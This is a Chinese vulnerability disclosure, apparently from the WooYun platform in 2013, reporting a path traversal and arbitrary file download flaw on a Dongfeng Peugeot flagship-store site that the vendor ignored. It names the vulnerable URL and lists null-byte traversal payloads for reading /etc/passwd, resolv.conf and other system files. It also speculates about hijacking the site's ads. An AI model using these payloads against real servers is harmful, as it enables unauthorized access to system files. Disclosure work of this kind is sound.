漏洞概要
关注数(24)
关注此漏洞
漏洞标题:东风标致旗舰店敏感信息泄漏服务器系统文件遍历与任意下载
提交时间:2013-11-21 14:51
修复时间:2013-11-26 14:52
公开时间:2013-11-26 14:52
漏洞类型:任意文件遍历/下载
危害等级:中
自评Rank:10
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
Tags标签:
无
漏洞详情
披露状态:
2013-11-21: 细节已通知厂商并且等待厂商处理中
2013-11-26: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
敏感信息泄漏 1查看系统用户 2dns服务器 3看看是什么版本的linux 4防火墙的配置 .....
发现此网站在很多大型汽车网站都有广告,而且是首页,那么得到网站权限,修改广告....你会发现很多网站也会中招吧....YY
详细说明:
......还有很多啊
http://301.peugeot.com.cn/img_down.php?p=
../../../../../../../../../../etc/passwd%00.jpg
../../../../../../../../../../etc/resolv.conf%00.jpg
../../../../../../../../../../proc/version%00.jpg
../../../../../../../../../../etc/services%00.jpg
漏洞证明:
修复方案:
版权声明:转载请注明来源 啊L川@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2013-11-26 14:52
厂商回复:
最新状态:
暂无
漏洞评价:
评论